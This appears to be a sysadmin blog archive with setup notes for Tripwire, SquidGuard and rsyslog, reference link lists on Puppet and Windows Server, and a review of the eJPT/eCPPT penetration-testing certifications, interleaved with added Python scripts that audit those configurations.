zypper addrepo http://download.opensuse.org/repositories/security/SLE_12_SP2/security.repo
zypper refresh
zypper install tripwire
twadmin --generate-keys --local-keyfile /etc/tripwire/$HOSTNAME-local.key
twadmin --create-cfgfile -S /etc/tripwire/site.key /etc/tripwire/twcfg.txt

In /etc:
cp twcfg.txt tw.cfg
cp twpol.txt tw.pol

Create twpol.txt if it does not exist:
# Begin twpol.txt

(
  rulename = "Tripwire Data Files",
  severity = 100
)
{
  /var/lib/tripwire                    -> $(Dynamic) -i ;
  /var/lib/tripwire/report             -> $(Dynamic) (recurse=0) ;
}

(
  rulename = "Root & Home",
  severity = 100
)
{
  /                                    -> $(IgnoreAll) (recurse=1) ;
  /home                                -> $(IgnoreAll) (recurse=1) ;
}

(
  rulename = "System Directories",
  severity = 100
)
{
  /bin                                 -> $(IgnoreNone)-SHa ;
  /boot                                -> $(IgnoreNone)-SHa ;
  /etc                                 -> $(IgnoreNone)-SHa ;
  /lib                                 -> $(IgnoreNone)-SHa ;
  /opt                                 -> $(IgnoreNone)-SHa ;
  /root                                -> $(IgnoreNone)-SHa ;
  /sbin                                -> $(IgnoreNone)-SHa ;
  /usr                                 -> $(IgnoreNone)-SHa ;
}

# End twpol.txt

twadmin --create-polfile -S site.key /etc/tripwire/twpol.txt
tripwire --init

tripwire --check
tripwire --check --interactive
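
The policy decides what tripwire --check can ever report, so it is worth checking mechanically that the directories you care about sit under a rule that does not ignore them. The following Python 3 block is an added example, not from the original post or from Tripwire: it parses the twpol.txt snippet above (embedded here as sample input) and reports paths that are uncovered or covered only by $(IgnoreAll).

```python
import re

# Sample input: the twpol.txt from the post above.
SAMPLE_POLICY = """
(
  rulename = "Tripwire Data Files",
  severity = 100
)
{
  /var/lib/tripwire                    -> $(Dynamic) -i ;
  /var/lib/tripwire/report             -> $(Dynamic) (recurse=0) ;
}

(
  rulename = "Root & Home",
  severity = 100
)
{
  /                                    -> $(IgnoreAll) (recurse=1) ;
  /home                                -> $(IgnoreAll) (recurse=1) ;
}

(
  rulename = "System Directories",
  severity = 100
)
{
  /bin                                 -> $(IgnoreNone)-SHa ;
  /boot                                -> $(IgnoreNone)-SHa ;
  /etc                                 -> $(IgnoreNone)-SHa ;
  /lib                                 -> $(IgnoreNone)-SHa ;
  /opt                                 -> $(IgnoreNone)-SHa ;
  /root                                -> $(IgnoreNone)-SHa ;
  /sbin                                -> $(IgnoreNone)-SHa ;
  /usr                                 -> $(IgnoreNone)-SHa ;
}
"""

# A rule: attribute block in parentheses, then an entry block in braces.
RULE_RE = re.compile(
    r'\(\s*rulename\s*=\s*"([^"]+)"\s*,\s*severity\s*=\s*(\d+)\s*\)\s*\{(.*?)\}',
    re.DOTALL)
# An entry: path -> property mask (and optional attributes such as (recurse=0)) ;
ENTRY_RE = re.compile(r"^\s*(\S+)\s*->\s*(.+?)\s*;", re.MULTILINE)


def parse_policy(text):
    """Return [{'name', 'severity', 'entries': [(path, properties)]}] per rule."""
    rules = []
    for name, severity, body in RULE_RE.findall(text):
        rules.append({"name": name, "severity": int(severity),
                      "entries": ENTRY_RE.findall(body)})
    return rules


def coverage(rules, paths):
    """For each path, the (rule name, properties) entry that watches it, or None."""
    watched = {}
    for rule in rules:
        for path, props in rule["entries"]:
            watched[path] = (rule["name"], props)
    return {p: watched.get(p) for p in paths}


def audit(text, must_watch=("/etc", "/bin", "/sbin", "/usr", "/boot")):
    """Paths from must_watch that no rule covers, or that a rule ignores entirely."""
    problems = []
    for path, hit in coverage(parse_policy(text), must_watch).items():
        if hit is None:
            problems.append("%s: not covered by any rule" % path)
        elif "IgnoreAll" in hit[1]:
            problems.append("%s: covered by rule '%s' but with IgnoreAll" % (path, hit[0]))
    return problems


if __name__ == "__main__":
    for rule in parse_policy(SAMPLE_POLICY):
        print(rule["name"], rule["severity"], len(rule["entries"]), "entries")
    print(audit(SAMPLE_POLICY) or "all must-watch paths covered")
    print(audit(SAMPLE_POLICY, must_watch=("/", "/home", "/var")))
```

Matching is on the exact path string, which is how the entries in the policy are written; a directory that is only reached through a parent's recurse setting is reported as uncovered, which is the conservative answer.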


Thursday, 19 April 2018

Installing SquidGuard on CentOS 7.x

Get Berkeley DB 4.6.21:
wget http://download.oracle.com/berkeley-db/db-4.6.21.tar.gz

cd db-46..
cd build_unix
../dist/configure 
make
make install

ln -s /usr/local/BerkeleyDB.4.6 /usr/local/BerkeleyDB


export LD_RUN_PATH=/usr/local/BerkeleyDB/lib
./configure
make
make install

Get the blacklist from here:
http://www.shalla.de/service.html

Link the static lists into the squidGuard db directory:
ln -s /opt/3rdparty/BL/anonvpn /usr/local/squidGuard/db
ln -s /opt/3rdparty/BL/hacking /usr/local/squidGuard/db
ln -s /opt/3rdparty/BL/dating /usr/local/squidGuard/db
ln -s /opt/3rdparty/BL/gamble /usr/local/squidGuard/db
ln -s /opt/3rdparty/BL/movies /usr/local/squidGuard/db
ln -s /opt/3rdparty/BL/music /usr/local/squidGuard/db
ln -s /opt/3rdparty/BL/porn /usr/local/squidGuard/db
ln -s /opt/3rdparty/BL/sex /usr/local/squidGuard/db
ln -s /opt/3rdparty/BL/spyware /usr/local/squidGuard/db
ln -s /opt/3rdparty/BL/tracker /usr/local/squidGuard/db
ln -s /opt/3rdparty/BL/urlshortener /usr/local/squidGuard/db
ln -s /opt/3rdparty/BL/violence /usr/local/squidGuard/db
ln -s /opt/3rdparty/BL/warez /usr/local/squidGuard/db
ln -s /opt/3rdparty/BL/weapons /usr/local/squidGuard/db

SquidGuard configuration:
dbhome /usr/local/squidGuard/db
logdir /usr/local/squidGuard/log

dest anonvpn{
         log             anonvpn
         domainlist      anonvpn/domains
         urllist         anonvpn/urls
 }

dest hacking{
         log             hacking
         domainlist      hacking/domains
         urllist         hacking/urls
 }

dest dating{
         log             dating
         domainlist      dating/domains
         urllist         dating/urls
 }


dest gamble{
         log             gamble
         domainlist      gamble/domains
         urllist         gamble/urls
 }

dest movies{
         log             movies
         domainlist      movies/domains
         urllist         movies/urls
 }

dest music{
         log             music
         domainlist      music/domains
         urllist         music/urls
 }

dest porn{
         log             porn
         domainlist      porn/domains
         urllist         porn/urls
 }



dest spyware{
         log             spyware
         domainlist      spyware/domains
         urllist         spyware/urls
 }

dest tracker{
         log             tracker
         domainlist      tracker/domains
         urllist         tracker/urls
 }

dest urlshortener{
         log             urlshortener
         domainlist      urlshortener/domains
         urllist         urlshortener/urls
 }

dest violence{
         log             violence
         domainlist      violence/domains
         urllist         violence/urls
 }

dest warez{
         log             warez
         domainlist      warez/domains
         urllist         warez/urls
 }

dest weapons{
         log             weapons
         domainlist      weapons/domains
         urllist         weapons/urls
 }


acl {
  default {
   pass !anonvpn !hacking !dating !gamble !movies !music !porn !spyware !tracker !urlshortener !violence !warez !weapons all
   redirect 302:http://www.google.com
  }
 }



Switch off SELinux in /etc/sysconfig/selinux:
# vi /etc/sysconfig/selinux

And set / update it as follows:
SELINUX=disabled

chkconfig squid on

You will have to compile the lists in order for squidGuard to work with them. To remove an entry from a list and recompile it in the DB:
cd /usr/local/squidGuard/db
grep -r "example.com"
cd /usr/local/bin/
./squidGuard -C movies/domains
service squid restart

In Squid config:
# Try connecting to first 25 ips of domain name
forward_max_tries 25
#squidGuard
redirect_program /usr/local/bin/squidGuard -c /usr/local/squidGuard/squidGuard.conf
url_rewrite_bypass off
url_rewrite_program /usr/local/bin/squidGuard -c /usr/local/squidGuard/squidGuard.conf
#debug_options ALL,1 29,1
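
A squidGuard that cannot open one of its databases drops into emergency mode and passes every request unfiltered, so a dest whose list is missing or not yet compiled silently turns the filter off. The following Python 3 block is an added example, not from the original post or from squidGuard: it parses a squidGuard.conf of the shape shown above (embedded here as a constructed subset) and reports lists that are missing, lists that have no compiled .db next to them, and acl pass rules that name a dest that was never defined. The filesystem is replaced by a constructed set of paths so the check runs offline; pass os.path.exists (the default) to check a real installation.

```python
import os
import re

# Constructed sample config: a subset of the squidGuard.conf above, with one
# dest ("dating") used in the acl but never defined.
SAMPLE_CONF = """
dbhome /usr/local/squidGuard/db
logdir /usr/local/squidGuard/log

dest hacking{
        log             hacking
        domainlist      hacking/domains
        urllist         hacking/urls
}

dest warez{
        log             warez
        domainlist      warez/domains
        urllist         warez/urls
}

acl {
  default {
   pass !hacking !warez !dating all
   redirect 302:http://www.google.com
  }
}
"""

# Constructed stand-in for the filesystem. Assumption: squidGuard -C writes a
# .db file next to each source list. Here warez/domains was never compiled and
# warez/urls is missing altogether.
SAMPLE_FS = {
    "/usr/local/squidGuard/db/hacking/domains",
    "/usr/local/squidGuard/db/hacking/domains.db",
    "/usr/local/squidGuard/db/hacking/urls",
    "/usr/local/squidGuard/db/hacking/urls.db",
    "/usr/local/squidGuard/db/warez/domains",
}

DEST_RE = re.compile(r"^\s*dest\s+(\w+)\s*\{(.*?)\}", re.MULTILINE | re.DOTALL)
LIST_RE = re.compile(r"(domainlist|urllist)\s+(\S+)")
PASS_RE = re.compile(r"^\s*pass\s+(.*?)\s*$", re.MULTILINE)


def parse_config(text):
    """Return (dbhome, {dest: {'domainlist'|'urllist': relative path}}, [pass rules])."""
    m = re.search(r"^\s*dbhome\s+(\S+)", text, re.MULTILINE)
    dbhome = m.group(1) if m else "/usr/local/squidGuard/db"
    dests = {name: dict(LIST_RE.findall(body)) for name, body in DEST_RE.findall(text)}
    return dbhome, dests, PASS_RE.findall(text)


def check_config(text, exists=os.path.exists):
    """Everything that would push squidGuard into emergency mode or leave a
    category unfiltered."""
    problems = []
    dbhome, dests, pass_rules = parse_config(text)
    for name, lists in dests.items():
        for kind, rel in lists.items():
            path = os.path.join(dbhome, rel)
            if not exists(path):
                problems.append("dest %s: %s %s is missing" % (name, kind, path))
            elif not exists(path + ".db"):
                problems.append("dest %s: %s not compiled, run: squidGuard -C %s" % (name, path, rel))
    for rule in pass_rules:
        for token in rule.split():
            dest = token.lstrip("!")
            if dest not in ("all", "none", "any") and dest not in dests:
                problems.append("acl pass rule references unknown dest '%s'" % dest)
    return problems


if __name__ == "__main__":
    for problem in check_config(SAMPLE_CONF, exists=lambda p: p in SAMPLE_FS):
        print(problem)
```

Run it after every blacklist update and before `service squid restart`, since the compiled .db files are what squidGuard actually loads.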


Wednesday, 18 April 2018

Puppet Picks

Some useful Puppet picks if you want to use Puppet, write modules for it, or install Foreman.

Modules:
https://forge.puppet.com/ghoneycutt?utf-8=%E2%9C%93&sort=&page=3
https://forge.puppet.com/saz/rsyslog
https://forge.puppet.com/puppetlabs/firewall
https://forge.puppet.com/razorsedge/network
https://www.youtube.com/channel/UC_BpuLm5IvV2tme4WSHEdgw
https://wiki.infn.it/progetti/cloud-areapd/best_practices/config_puppetrun

Writing modules:
http://www.bogotobogo.com/DevOps/Puppet/puppet_locking_user_accounts_deploying_sudoers_file.php
https://www.linode.com/docs/applications/puppet/create-puppet-module
https://www.linode.com/docs/applications/puppet/install-and-configure-puppet

Installation:
http://prolinuxhub.com/install-forman-on-centos-7/
http://www.linuxtechi.com/install-and-configure-foreman-on-centos-7-x/
http://www.itzgeek.com/how-tos/linux/ubuntu-how-tos/install-foreman-on-centos-7-rhel-7-ubuntu-14-04-3.html
http://www.ehowstuff.com/disable-ipv6-on-redhat-centos-6-centos-7/
https://www.linode.com/docs/applications/puppet/install-and-configure-puppet
https://ask.puppet.com/question/2451/how-do-you-change-the-runinterval/
https://linuxconfig.org/puppet-agent-exiting-no-certificate-found-and-waitforcert-is-disabled-solution
http://devopspy.com/devops/install-puppet-master-agent-on-centos-7/
http://opensourceforu.com/2011/01/data-centre-automation-puppet-resources-types-examples/
https://docs.puppet.com/puppet/latest/install_linux.html

Rsyslog UDP/TCP

There is a small but important catch when you configure rsyslog: the protocol marker on the forwarding action at the end of the config. For classic UDP use a single @, for TCP use @@.

# The authpriv file has restricted access.
authpriv.*                                              /var/log/secure

# Log all the mail messages in one place.
mail.*                                                  -/var/log/maillog


# Log cron stuff
cron.*                                                  /var/log/cron

# Everybody gets emergency messages
*.emerg                                                 :omusrmsg:*

# Save news errors of level crit and higher in a special file.
uucp,news.crit                                          /var/log/spooler

# Save boot messages also to boot.log
local7.*                                                /var/log/boot.log

$ActionQueueFileName fwdRule1 # unique name prefix for spool files
$ActionQueueMaxDiskSpace 1g   # 1gb space limit (use as much as possible)
$ActionQueueSaveOnShutdown on # save messages to disk on shutdown
$ActionQueueType LinkedList   # run asynchronously
$ActionResumeRetryCount -1    # infinite retries if host is down
# remote host is: name/ip:port, e.g. 192.168.0.1:514, port optional
*.* @IP:514
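
Because the whole difference is one character, it is easy to check a config file for it rather than discover the wrong transport after messages go missing. The following Python 3 block is an added example, not from the original post: it picks the legacy-syntax forwarding actions out of an rsyslog config, reports selector, transport, host and port (defaulting to 514 when no port is given), and points out the UDP ones. The sample config and the hostnames in it are constructed.

```python
import re

# Legacy-syntax forwarding action: selector, whitespace, @ (UDP) or @@ (TCP),
# optional (options) such as (o), host, optional :port.
FORWARD_RE = re.compile(r"^\s*([^\s#]+)\s+(@@?)(?:\([^)]*\))?([^\s:]+)(?::(\d+))?\s*$")


def parse_forwarding(config_text):
    """Return (selector, protocol, host, port) for every forwarding action."""
    actions = []
    for line in config_text.splitlines():
        m = FORWARD_RE.match(line)
        if not m:
            continue  # local file actions, $Action* directives, comments
        selector, marker, host, port = m.groups()
        proto = "tcp" if marker == "@@" else "udp"
        actions.append((selector, proto, host, int(port) if port else 514))
    return actions


def lint_forwarding(config_text):
    """Forwarding actions that give no delivery guarantee."""
    notes = []
    for selector, proto, host, port in parse_forwarding(config_text):
        if proto == "udp":
            notes.append("%s -> %s:%d uses UDP (@); use @@ for TCP if loss matters"
                         % (selector, host, port))
    return notes


# Constructed sample: the tail of the config above plus one TCP action.
SAMPLE_CONF = """\
authpriv.*                                              /var/log/secure
$ActionQueueType LinkedList   # run asynchronously
*.* @IP:514
*.* @@(o)logs.example.com:6514
"""

if __name__ == "__main__":
    for action in parse_forwarding(SAMPLE_CONF):
        print(action)
    for note in lint_forwarding(SAMPLE_CONF):
        print(note)
```

The regex covers the legacy @/@@ form shown in the post; the newer `action(type="omfwd" ...)` syntax has its `protocol` as an explicit parameter and is not parsed here.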

References:
https://devops.profitbricks.com/tutorials/configure-remote-logging-with-rsyslog/
http://unix.stackexchange.com/questions/280697/rsyslog-not-forwarding-messages-to-remote-rsyslog-server
http://serverfault.com/questions/667728/configure-and-test-rsyslog-to-udp-socket
http://xmodulo.com/configure-rsyslog-client-centos.html

Tuesday, 10 October 2017

Microsoft Infrastructure Fundamentals

Some references I gathered over time on Microsoft Windows Administration.

Happy reading,
Yuriy

Server Limits Specifications:
https://msdn.microsoft.com/en-us/library/windows/desktop/aa366778(v=vs.85).aspx#physical_memory_limits_windows_server_2012

Logical CPU Limits:
https://blogs.technet.microsoft.com/matthts/2012/10/13/windows-server-sockets-logical-processors-symmetric-multi-threading/

Windows Server Comparison:
https://www.thomas-krenn.com/en/wiki/Windows_Server_2012_Editions_comparison


Articles:
Default gateways
https://technet.microsoft.com/en-us/library/cc779696(v=ws.10).aspx

DNSSEC:
https://technet.microsoft.com/en-us/library/jj200221.aspx

DNS Records:
https://technet.microsoft.com/en-us/library/cc958958.aspx

Domains:
https://technet.microsoft.com/en-us/library/cc780856(v=ws.10).aspx
https://technet.microsoft.com/en-us/library/bb629410.aspx
https://technet.microsoft.com/en-us/library/dd197461
https://technet.microsoft.com/en-us/library/cc780661
https://technet.microsoft.com/en-us/library/cc730756
https://technet.microsoft.com/en-us/library/cc754345.aspx
https://technet.microsoft.com/en-us/library/cc725590.aspx
https://technet.microsoft.com/en-us/library/cc771255(v=ws.11).aspx
https://technet.microsoft.com/en-us/library/cc755131.aspx
https://technet.microsoft.com/en-us/library/ee683907(v=ws.10).aspx
https://technet.microsoft.com/en-us/library/cc753579.aspx

Zones:
https://technet.microsoft.com/en-us/library/cc771898.aspx
https://technet.microsoft.com/en-us/library/cc816885(v=ws.10).aspx
https://technet.microsoft.com/en-us/library/cc779197(v=ws.10).aspx
https://technet.microsoft.com/en-us/library/ee649181(v=ws.10).aspx
https://technet.microsoft.com/en-us/library/cc775397(v=ws.10).aspx

Cache Locking:
https://technet.microsoft.com/en-us/library/ee649148(v=ws.10).aspx

IP Addresses:
https://technet.microsoft.com/en-us/library/cc958825.aspx
https://technet.microsoft.com/en-us/library/bb726995.aspx
https://technet.microsoft.com/en-us/library/cc958834.aspx
https://technet.microsoft.com/en-us/library/cc940018.aspx

DHCP:
https://technet.microsoft.com/en-us/library/cc738472(v=ws.10).aspx
https://technet.microsoft.com/en-us/library/cc783103(WS.10).aspx
https://technet.microsoft.com/en-us/library/hh831825.aspx
https://technet.microsoft.com/en-us/library/cc958946.aspx
https://technet.microsoft.com/en-us/library/cc958935.aspx
http://www.tcpipguide.com/free/t_DHCPLeaseRenewalandRebindingProcesses-2.htm
http://www.thenetworkencyclopedia.com/entry/dynamic-host-configuration-protocol-dhcp/
https://technet.microsoft.com/en-us/library/cc779610(v=ws.10).aspx

What Are Domains and Forests?
https://technet.microsoft.com/en-us/library/cc759073(v=ws.10).aspx

Active Directory Administrative Center: Getting Started:
https://technet.microsoft.com/en-us/library/dd560651(v=ws.10).aspx

Understanding Sites, Subnets, and Site Links:
https://technet.microsoft.com/en-us/library/cc754697.aspx

Privileged Access Management for Active Directory Domain Services:
https://docs.microsoft.com/en-us/microsoft-identity-manager/pam/privileged-identity-management-for-active-directory-domain-services

Install and Deploy Windows Server 2012 R2 and Windows Server 2012:
https://technet.microsoft.com/en-us/library/hh831620.aspx

Migrating Roles and Features in Windows Server:
https://technet.microsoft.com/en-us/windowsserver/jj554790.aspx

Linking GPOs to Active Directory Containers:
https://msdn.microsoft.com/en-us/library/aa374339(v=vs.85).aspx

Designing OU Structures that Work:
https://technet.microsoft.com/en-us/magazine/2008.05.oudesign.aspx

Active Directory Best Practice: OUs and Containers:
http://www.trivalentgroup.com/2015/11/active-directory-best-practice-ous-and-containers/

Active Directory Schema Tools and Settings
https://technet.microsoft.com/en-us/library/cc757747(v=ws.10).aspx

What Is the Global Catalog?
https://technet.microsoft.com/en-us/library/cc728188(v=ws.10).aspx

What Is the Active Directory Schema?
https://technet.microsoft.com/en-us/library/cc784826(v=ws.10).aspx

Resets the Directory Services Restore Mode (DSRM) password
https://technet.microsoft.com/en-us/library/cc754363(v=ws.11).aspx

Performing an Authoritative Restore:
https://technet.microsoft.com/en-us/library/cc940334.aspx

Performing a Nonauthoritative Restore of a Domain Controller
https://technet.microsoft.com/en-us/library/cc784922(v=ws.10).aspx

Understanding Trusts:
https://technet.microsoft.com/en-us/library/cc736874(v=ws.10).aspx

Ntdsutil
https://technet.microsoft.com/en-us/library/cc753343.aspx

Server Manager Technical Overview:
https://technet.microsoft.com/en-us/library/cc753319.aspx

Managing Windows Server 2012 and Windows Server 2012 R2 with Remote Server Administration Tools:
https://blogs.technet.microsoft.com/ausoemteam/2015/03/21/managing-windows-server-2012-and-windows-server-2012-r2-with-remote-server-administration-tools/

Recovering Active Directory Domain Services:
https://technet.microsoft.com/en-us/library/cc816751(v=ws.10).aspx

Requirements for Active Directory Recycle Bin:
https://technet.microsoft.com/en-us/library/dd379484(v=ws.10).aspx

Active Directory Recycle Bin Step-by-Step Guide:
https://technet.microsoft.com/en-us/library/dd392261(v=ws.10).aspx

Group types:
https://technet.microsoft.com/en-us/library/cc781446(v=ws.10).aspx

Default groups:
https://technet.microsoft.com/en-us/library/cc756898(v=ws.10).aspx

Nesting groups:
https://technet.microsoft.com/en-us/library/cc776499(v=ws.10).aspx

Active Directory Security Groups:
https://technet.microsoft.com/en-us/library/dn579255(v=ws.11).aspx

Managing Computers:
https://technet.microsoft.com/en-us/library/cc771682.aspx

Detailed Concepts: Secure Channel Explained
http://social.technet.microsoft.com/wiki/contents/articles/24644.detailed-concepts-secure-channel-explained.aspx

Group Policy Overview
https://technet.microsoft.com/en-us/library/hh831791.aspx

Performance Team Blog:
https://blogs.technet.microsoft.com/askperf/

SMB:
https://blogs.technet.microsoft.com/josebda/2013/10/02/windows-server-2012-r2-which-version-of-the-smb-protocol-smb-1-0-smb-2-0-smb-2-1-smb-3-0-or-smb-3-02-are-you-using/

Bitlocker:
https://technet.microsoft.com/en-us/library/cc766200%28v=ws.10%29.aspx

https://technet.microsoft.com/en-us/library/cc732774.aspx

https://technet.microsoft.com/en-us/library/jj679890.aspx

Storage Technologies:
https://technet.microsoft.com/en-us/library/dn610883.aspx
https://technet.microsoft.com/en-us/library/hh831739.aspx
https://blogs.technet.microsoft.com/josebda/2014/11/19/storage-spaces-survival-guide-links-to-presentations-articles-blogs-tools/
https://technet.microsoft.com/windows-server-docs/storage/storage-spaces/storage-spaces-direct-windows-server-2016
https://blogs.technet.microsoft.com/askpfeplat/2012/10/10/windows-server-2012-storage-spaces-is-it-for-you-could-be/
https://technet.microsoft.com/windows-server-docs/storage/software-defined-storage/storage-quality-of-service
https://technet.microsoft.com/en-us/library/hh831602.aspx


Hands on:

Deduplication:
https://blogs.technet.microsoft.com/canitpro/2013/04/29/step-by-step-enabling-data-deduplication-on-windows-server-2012-volumes/

iSCSI:
https://blogs.technet.microsoft.com/filecab/2012/05/21/introduction-of-iscsi-target-in-windows-server-2012/

Bitlocker:
http://accc.uic.edu/answer/how-do-i-configure-active-directory-store-bitlocker-recovery-information

DHCP:
https://technet.microsoft.com/en-us/library/cc732075.aspx
https://technet.microsoft.com/en-us/library/cc757682(v=ws.10).aspx
https://technet.microsoft.com/en-us/library/cc779507(v=ws.10).aspx
https://technet.microsoft.com/en-us/library/dn425039.aspx
https://technet.microsoft.com/en-us/library/cc786474(v=ws.10).aspx
https://blogs.technet.microsoft.com/teamdhcp/2009/01/22/how-to-configure-split-scope-using-wizard/
https://blogs.technet.microsoft.com/teamdhcp/2012/09/03/dhcp-failover-hot-standby-mode/
http://www.serverlab.ca/tutorials/windows/network-services-windows/step-step-creating-windows-server-dhcp-scope/
https://technet.microsoft.com/en-us/library/dd759168(v=ws.11).aspx
https://technet.microsoft.com/en-us/library/hh831385(v=ws.11).aspx

DNS:
https://technet.microsoft.com/en-us/library/cc754941
https://blogs.technet.microsoft.com/networking/2008/03/19/dont-be-afraid-of-dns-scavenging-just-be-patient/
https://technet.microsoft.com/en-us/library/ff807360(v=ws.10).aspx
https://technet.microsoft.com/en-us/library/cc816657(v=ws.10).aspx
https://technet.microsoft.com/en-us/library/ee649174(v=ws.10).aspx

Storage Spaces: How to configure Storage Tiers with Windows Server 2012 R2:
https://blogs.technet.microsoft.com/askpfeplat/2013/10/20/storage-spaces-how-to-configure-storage-tiers-with-windows-server-2012-r2/

Installing and Configuring MPIO:
https://technet.microsoft.com/en-us/library/ee619752(v=ws.10).aspx

Installing and Configuring Microsoft iSCSI Initiator:
https://technet.microsoft.com/en-us/library/ee338480(v=ws.10).aspx

Switch between Full and Server Core in Windows Server 2012 using PowerShell 3.0:
https://blogs.technet.microsoft.com/puneetvig/2012/10/15/switch-between-full-and-server-core-in-windows-server-2012-using-powershell-3-0/

How to change default OU for computers in AD:
https://blogs.technet.microsoft.com/canitpro/

Install a New Windows Server 2012 Active Directory Child or Tree Domain (Level 200):
https://technet.microsoft.com/en-us/windows-server-docs/identity/ad-ds/deploy/install-a-new-windows-server-2012-active-directory-child-or-tree-domain--level-200-

http://pc-addicts.com/server-2012-change-default-ou/

Step-by-Step: Enabling and Using Fine-Grained Password Policies in AD
https://blogs.technet.microsoft.com/canitpro/2013/05/29/step-by-step-enabling-and-using-fine-grained-password-policies-in-ad/

How To Enable the Active Directory Recycle Bin:
https://redmondmag.com/articles/2015/11/11/enable-the-active-directory-recycle-bin.aspx

Step-By-Step: Setting Up Active Directory Sites, Subnets & Site-Links
https://blogs.technet.microsoft.com/canitpro/2015/03/03/step-by-step-setting-up-active-directory-sites-subnets-site-links/

Getting Started with Nano Server:
https://technet.microsoft.com/windows-server-docs/compute/nano-server/getting-started-with-nano-server

Get started with Setup and Boot Event Collection
https://technet.microsoft.com/windows-server-docs/compute/get-started-with-setup-and-boot-event-collection

Evaluation:
https://www.microsoft.com/en-us/evalcenter/evaluate-windows-server-2012?wt.mc_id=DXLEX_EDX_INF500x

ADSI Edit (adsiedit.msc)
https://technet.microsoft.com/en-us/library/cc773354(v=ws.10).aspx

Remote Server Administration Tools for Windows 10

How to Install Service Manager on a Single Computer
https://technet.microsoft.com/en-us/library/hh519747(v=sc.12).aspx

Promoting DC:
https://www.interworks.com/blog/ijahanshahi/2014/01/06/promoting-windows-2012r2-server-domain-controller

Configure Remote Desktop Access on Windows 7 Systems:
https://technet.microsoft.com/en-us/magazine/ff404238.aspx

Special Identities
https://technet.microsoft.com/en-us/library/dn617202.aspx

PS AD DS:
https://technet.microsoft.com/en-us/library/hh852274(v=wps.630).aspx

Use the Wbadmin Backup Command Line Utility in Windows Server 2008:
https://technet.microsoft.com/en-us/magazine/dd767786.aspx

Backing Up Active Directory Domain Services:
https://technet.microsoft.com/en-us/library/cc816584(v=ws.10).aspx

Offline Domain Join (Djoin.exe) Step-by-Step Guide
https://technet.microsoft.com/en-us/library/offline-domain-join-djoin-step-by-step(v=ws.10).aspx

Delegate Permissions for Group Policy
https://technet.microsoft.com/en-us/library/dn789195.aspx

Create a new organizational unit
https://technet.microsoft.com/en-us/library/cc785077(v=ws.10).aspx

Creating the Security Group
https://technet.microsoft.com/en-us/library/cc732782(v=ws.10).aspx

Creating Roaming Profiles:
http://www.grouppolicy.biz/2010/08/best-practice-roaming-profiles-and-folder-redirection-a-k-a-user-virtualization/

PowerShell stuff:
https://technet.microsoft.com/en-us/library/ee617253.aspx
https://technet.microsoft.com/en-us/library/ee617258.aspx
https://technet.microsoft.com/en-us/library/ee617210.aspx
https://technet.microsoft.com/en-us/library/ee617245.aspx
https://technet.microsoft.com/en-us/library/jj574143.aspx
https://technet.microsoft.com/en-us/library/jj612821(v=wps.630).aspx
https://technet.microsoft.com/en-us/library/hh826098(v=wps.630).aspx
https://technet.microsoft.com/en-us/library/jj612803%28v=wps.630%29.aspx
https://technet.microsoft.com/en-us/library/hh826099%28v=wps.630%29.aspx
https://technet.microsoft.com/en-us/library/hh848689(v=wps.630).aspx
https://technet.microsoft.com/en-us/library/hh848686(v=wps.630).aspx
https://technet.microsoft.com/en-us/library/hh831434.aspx
https://technet.microsoft.com/en-us/library/hh848450.aspx
https://technet.microsoft.com/en-us/library/hh831700.aspx
https://technet.microsoft.com/windows-server-docs/networking/dns/what-s-new-in-dns-server
https://technet.microsoft.com/en-us/library/jj590751(v=wps.630).aspx
https://technet.microsoft.com/en-us/library/jj590743(v=wps.630).aspx

Thursday, 3 August 2017

Review eLearnSecurity eJPT, eCPPT

I currently hold the following penetration testing certifications from eLearnSecurity, having passed both exams:
  • eJPT
  • eCPPT


I would like to share my experience here. 

About the labs: they are quite different in approach compared to other certifications - the orientation is towards skills rather than CTF targets. Personally I found it a better choice, since you learn quite a lot in a very short time (if you are dedicated). Not having free time, my only option was to study in the early morning, from 6 am to 8 am. After obtaining the eJPT I was able to pass the eCPPT as well within a month.

Most important takeaways during the learning process:
- Do all the labs.
- Try to automate tasks and repeat the labs with the automated tools you have created.
- Know the flaws of your tools.
- Document everything and be organized.
- Read.
- Advance.

Labs

During the labs I found that some of the tools I use have changed over time, specifically Metasploit. There are lots of online resources regarding Metasploit, so this is not a big issue, but it will waste your time if you have not done your research. For example, I was really surprised that some Windows post-exploitation tools are not supported anymore. So do your research in advance. Also try to understand how it can be done manually - for instance, if tool X does not work, as a workaround I can export registry key Y, decrypt password Z, etc.

"This lab does not work as expected" - find the reason why. This might happen, and you can get support from the forums and search the older topics to resolve your issue. My suggestion is to simulate the environment locally and understand how the attack works - recreating situations helps a lot to understand the circumstances you are dealing with, and in most cases it is just a setting you have overlooked.

Knowledge domains

In a nutshell, eJPT gives you the ground knowledge, while eCPPT is a deep dive into the penetration testing world where you also get to practice "Exploit Development" - which itself is a huge knowledge domain. Pivoting is also a technique you have to master: it is widely used and will be of great advantage to you - you have to know how you can "move" between networks. All topics are widely covered both theoretically and practically; my advice would be to take the practical part more seriously.

As they state: 

eJPT:
  • Good knowledge of TCP/IP
  • Good knowledge of IP routing
  • Good knowledge of LAN protocols and devices
  • Good knowledge of HTTP and web technologies
  • Essential penetration testing processes and methodologies
  • Basic Vulnerability Assessment of Networks
  • Basic Vulnerability Assessment of Web Applications
  • Exploitation with Metasploit
  • Simple Web application Manual exploitation
  • Basic Information Gathering and Reconnaissance
  • Simple Scanning and Profiling the target

eCPPT:
  • Penetration testing processes and methodologies
  • Vulnerability Assessment of Networks
  • Vulnerability Assessment of Web Applications
  • Advanced Exploitation with Metasploit
  • Performing Attacks in Pivoting
  • Web application Manual exploitation
  • Information Gathering and Reconnaissance
  • Scanning and Profiling the target
  • Privilege escalation and Persistence
  • Exploit Development
  • Advanced Reporting skills and Remediation



Exams

Surprisingly fun - I have not had that much fun in years. If you have done the labs you cannot go wrong. If you have issues during the lab you can reset it, but remember that you will have to re-exploit all of your targets - automate as much as possible. Some of the targets are harder, but in time you will find your way in. The biggest advantage of both exams is that there is plenty of time. For eJPT, as far as I remember, you get 3 days; by my criteria 24 h for this level is more than enough. The eCPPT exam was really interesting; I completed it in 3 days including the report writing, but usually you get a week for the exam and a week for the report. In both exams you will get to test the skills you have learned, so again, do the labs - properly.

About the penetration testing report for eCPPT: the report is the most interesting part - you will have to organize all of your information and prepare a detailed analysis. It is best to get it done manually if you want to have a good report and pass the exam.

Tools

You are not limited in any way.

References: